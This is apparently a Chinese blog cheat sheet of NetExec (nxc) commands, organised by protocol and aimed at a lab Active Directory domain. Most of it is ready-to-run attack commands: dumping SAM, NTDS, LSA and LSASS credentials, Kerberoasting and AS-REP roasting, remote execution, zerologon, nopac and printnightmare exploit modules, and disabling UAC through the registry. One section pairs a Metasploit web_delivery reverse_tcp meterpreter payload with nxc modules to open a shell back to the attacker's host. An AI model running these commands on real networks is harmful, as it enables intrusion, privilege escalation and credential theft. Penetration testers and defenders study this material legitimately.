NetExec 命令总结

发布时间:2026/9/4 18:00:17
NetExec 命令总结 天有阴阳风雨晦明之气人有喜怒哀乐好恶之情。导航工具介绍命令语法支持协议杂项工具介绍NetExec又称 nxc是一款网络服务漏洞利用工具它是 CrackMapExec 的延续且支持的协议、模块、功能相较前者更为丰富。命令语法基本语法nxc Protocols Target [Generic] [Output] [AuthKerberos] [Modules] [Protocol-Option]Protocolswmi、rdp、winrm、ldap、ssh、mssql、nfs、smb、ftp、vnc。TargetIP(s)【特定 IP1.1.1.1 1.1.1.2】、range(s)【IP 范围1.1.1.1-254】、CIDR(s)【IP 段1.1.1.0/24】、hostname(s)【计算机名Win10】、FQDN(s)【网址www.test.com】、file(s)【文件】。Generic-t【线程数量】Output–verbose、–debug、–codec gbk【可执行 cmd 命令时才会出现此选项】Auth-u、-p【明文密码】、-H【哈希密码】、-d【域认证】、–local-auth【本地认证】、–continue-on-success【成功爆破到密码时不会立即停下而是继续进行。】、–no-bruteforce【将用户列表和密码列表一对一关联而不是以排列组合的方式关联。】Kerberos–use-kcache【使用变量 KRB5CCNAME 指定的票据文件】Modules-L【列出当前协议支持的模块】、-M【使用指定的模块】、-o【设置模块的参数信息】、–options【列出指定模块所支持的参数信息】Protocol-Option特定协议独有的特定功能选项这些选项通常都出现在开头的 options 部分和结尾的 Modules 部分的下方。【注smb 的协议选项是最丰富的支持的功能很多。】官方手册https://www.netexec.wiki/支持协议nxc 支持的协议有 ssh、vnc、rdp、winrm、ftp、nfs、mssql、wmi、ldap、smb协议根据命令的复杂度由低到高排序而每种协议所支持的功能也各有千秋以下将针对每种协议最有用的一些功能进行命令示例汇总。sshsudo 检查nxc ssh 192.168.56.20 -u kali -p kali --sudo-check【注此功能并不准确】命令执行nxc ssh 192.168.56.20 -u kali -p kali -x whoamivnc待补充rdp该功能存在严重的误报问题建议使用impacket-rdp_check skylark.com/admin:password123192.168.56.50进行 RDP 登录检查。winrm命令执行Cmdnxc winrm 192.168.56.50 -u admin -p password123 -d skylark.com -x whoami /priv --codec gbk命令执行PowerShellnxc winrm 192.168.56.50 -u administrator -p password123 --local-auth -X Get-Location --codec gbk注1如果目标系统是非英文语系则需要添加 --codec 选项对输入和输出的数据进行编码转换否则不光输出会乱码还可能导致输入的命令无法被解析导致 nxc 执行报错2winrm 对于低权限的用户不会表现的像 smb 那样还可以用来验证密码对错它不管用户凭证是否有效只要你无权限那么探测显示的标识和密码错误时显示的标识是一样的都是 [-]。ftp查看文件列表nxc ftp 192.168.56.50 -u user -p password123 --ls /nfs待补充mssql待补充wmi该协议支持的功能和模块smb 协议均支持因此关注 smb 部分即可此处不再赘述。票据用法#1首先获得票据impacket-getTGT skylark.com/admin -dc-ip192.168.56.50#2添加 DC2012.skylark.com 映射记录到 /etc/hosts 文件。#3执行票据认证exportKRB5CCNAMEadmin.ccache nxc wmi DC2012.skylark.com --use-kcache模块查询nxc wmi -Lldap注票据认证的使用见 wmi 部分。选项类烘烤攻击nxc ldap 192.168.56.50 -u admin -p password123 -d skylark.com --asreproast ker1Kerberoasting 攻击nxc ldap 192.168.56.50 -u admin -p password123 -d skylark.com --kerberoasting ker2列出域 SID、用户、组nxc ldap 192.168.56.50 -u user -p password123 -d skylark.com --get-sid --active-users --groups【这些信息的获取似乎借助 enum4linux 会更方便一些。】LDAP 语法查询nxc ldap 192.168.56.50 -u user -p password123 -d skylark.com --query (sAMAccountNameadmin) *【图形化工具 ADExplorer 更直观一些。】模块类用户详情查询nxc ldap 192.168.56.50 -u user -p password123 -d skylark.com -M whoami -o USERadmin查询用户所属组nxc ldap 192.168.56.50 -u user -p password123 -d skylark.com -M groupmembership -o USERadmin查询组成员nxc ldap 192.168.56.50 -u user -p password123 -d skylark.com -M group-mem -o GROUPdomain admins用户描述列表nxc ldap 192.168.56.50 -u user -p password123 -d skylark.com -M user-desc入域主机的 IP 列表nxc ldap 192.168.56.50 -u user -p password123 -d skylark.com -M get-network枚举提权漏洞 CVE-2022-26923ADCS的利用前提条件#枚举证书颁发机构nxc ldap192.168.56.50-uuser-ppassword123-dskylark.com-Madcs#枚举 MachineAccountQuota 值nxc ldap192.168.56.50-uuser-ppassword123-dskylark.com-Mmaqsmb注票据认证的使用见 wmi 部分。选项类转储凭证nxc smb192.168.56.50-uadmin-ppassword123-dskylark.com--samnxc smb192.168.56.50-uadmin-ppassword123-dskylark.com--ntdsnxc smb192.168.56.50-uadmin-ppassword123-dskylark.com--lsa#当用户在 Backup Operators 组时可以使用该模块转储本地 SAM 哈希【注这种用户具有访问 C:\目录的权限。】。nxc smb192.168.56.50-uadmin-ppassword123-dskylark.com-Mbackup_operator文件传输#文件上传nxc smb192.168.56.50-uadmin-ppassword123-dskylark.com --put-file whoami.exe\\tmp\\whoami.exe#文件下载nxc smb192.168.56.50-uadmin-ppassword123-dskylark.com --get-file\\tmp\\123.txt456.txt#注不管是文件上传还是下载这里 \\tmp 所指的是根目录 C 盘下的 tmp 目录。命令执行#以 smbexec 方法去执行 cmd 命令nxc smb192.168.56.50-uadmin-ppassword123-dskylark.com --exec-method smbexec-xwhoami#以 mmcexec 方法去执行混淆了的 powershell 命令nxc smb192.168.56.50-uadmin-ppassword123-dskylark.com --exec-method mmcexec-XGet-Location--obfs共享枚举#枚举共享nxc smb192.168.56.50-uuser-ppassword123-dskylark.com--shares#搜寻后缀是 .txt 的文件切忌不要使用 *.txt 这样的通配符匹配格式。nxc smb192.168.56.50-uadmin-ppassword123-dskylark.com--spiderSYSVOL--pattern.txt#遍历共享中的所有文件nxc smb192.168.56.50-uuser-ppassword123-dskylark.com--spiderSYSVOL-Mspider_plus#转储共享中的所有文件100m 以上的除外。nxc smb192.168.56.50-uuser-ppassword123-dskylark.com--spiderSYSVOL-Mspider_plus-oDOWNLOAD_FLAGtrueMAX_FILE_SIZE99999999OUTPUT_FOLDER./tmp用户/组枚举#枚举用户nxc smb192.168.56.50-uuser-ppassword123-dskylark.com--users#枚举本地组nxc smb192.168.56.50-uuser-ppassword123-dskylark.com --local-groups#枚举域组nxc smb192.168.56.50-uuser-ppassword123-dskylark.com--groups#枚举机器账户nxc smb192.168.56.50-uuser-ppassword123-dskylark.com--computers查询密码策略nxc smb 192.168.56.50 -u user -p password123 -d skylark.com --pass-pol枚举盘符nxc smb 192.168.56.50 -u user -p password123 -d skylark.com --disks生成一个 NTLM 中继列表crackmapexec smb 192.168.56.0/24 --gen-relay-list relayip.txt模块类漏洞检测#同时检测 DFSCoerce、PetitPotam、PrinterBug、MSEven(shadowcoerce) 漏洞主要用于 NTLM 中继攻击利用。nxc smb192.168.56.50-Mcoerce_plus nxc smb192.168.56.50-uuser-ppassword123-dskylark.com-Mcoerce_plus#检测永恒之蓝漏洞RCE可直接获得高权限 shell。nxc smb192.168.56.50-Mms17-010#域提权漏洞nxc smb192.168.56.50-uuser-ppassword123-dskylark.com-Mnopac#域提权漏洞【注该漏洞会重置域控机器账户的密码为空为了不影响域控需在获取域哈希之后尽快恢复原来的密码。】nxc smb192.168.56.50-Mzerologon#本地提权漏洞nxc smb192.168.56.50-uuser-ppassword123-dskylark.com-Mprintnightmare#NTLM 中继攻击时SMB 转 LDAP 时可能需要的 remove-mic 漏洞nxc smb192.168.56.50-Mremove-mic网络适配器识别nxc smb 192.168.56.50 -u user -p password123 -d skylark.com -M ioxidresolver杀毒软件识别nxc smb 192.168.56.50 -u user -p password123 -d skylark.com -M enum_av转储 LSASS 进程nxc smb192.168.56.50-uadmin-ppassword123-dskylark.com-Mhandlekatz nxc smb192.168.56.50-uadmin-ppassword123-dskylark.com-Mhash_spider nxc smb192.168.56.50-uadmin-ppassword123-dskylark.com-Mlsassy nxc smb192.168.56.50-uadmin-ppassword123-dskylark.com-Mnanodump令牌管理#枚举令牌nxc smb192.168.56.50-uadmin-ppassword123-dskylark.com-Mimpersonate#模拟令牌nxc smb192.168.56.50-uadmin-ppassword123-dskylark.com-Mimpersonate-oTOKEN1EXECwhoami /priv#若 nxc 在执行命令时无响应可尝试使用 crackmapexec。# crackmapexec smb 192.168.56.50 -u admin -p password123 -d skylark.com -M impersonate -o TOKEN1 EXECwhoami /privWeb 投递载荷#启动 msf然后设置并运行 web 投递器msfconsole-qxuse exploit/multi/script/web_delivery;set target 2;set payload windows/x64/meterpreter/reverse_tcp;set lhost 192.168.56.20;run -j#然后根据生成的参数去设置模块的参数nxc smb192.168.56.50-uadmin-ppassword123-dskylark.com-Mweb_delivery-oURLhttp://192.168.56.20:8080/XipXSk1 或 nxc smb192.168.56.50-uadmin-ppassword123-dskylark.com-Mmet_inject-oSRVHOST192.168.56.20SRVPORT8080RANDDrXZnoiI5lJ51SSLhttpUAC 状态检查nxc smb192.168.56.50-uadmin-ppassword123-dskylark.com-Muac#关闭 UAC重启生效#reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f#或#Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA -Value 0启用 RDPnxc smb 192.168.56.50 -u admin -p password123 -d skylark.com -M rdp -o ACTIONenableAlwaysInstallElevated 状态检查nxc smb 192.168.56.50 -u admin -p password123 -d skylark.com -M install_elevatedPowerShell 历史文件导出 nxc smb 192.168.56.50 -u admin -p password123 -d skylark.com -M powershell_history -o exportTrue检查各种安全项nxc smb 192.168.56.50 -u admin -p password123 -d skylark.com -M wcc用户过期密码免登录控制台进行修改nxc smb 192.168.56.50 -u admin -p ‘password123’ -d skylark.com -M change-password -o NEWPASS‘pass’杂项有些协议的功能选项可能需要高权限的用户才能执行成功。而什么时候需要高权限什么时候普通用户也可以枚举这一点在模块类上 nxc 做出了区分但在选项类上则不太容易去区分。例如命令nxc smb ... --sam肯定需要高权限才能执行成功而命令nxc smb ... --users则只需普通用户权限即可执行成功。使用 -x 执行命令时如果账户部分未出现 Pwn3d!那么命令是不能被成功执行的。例如在面对未入域的主机使用本地管理组用户 admin 去执行命令时命令是不能被成功执行的。原因应该是 UAC 机制导致的中完整性 shell 不完整的管理员权限导致的。我的博客园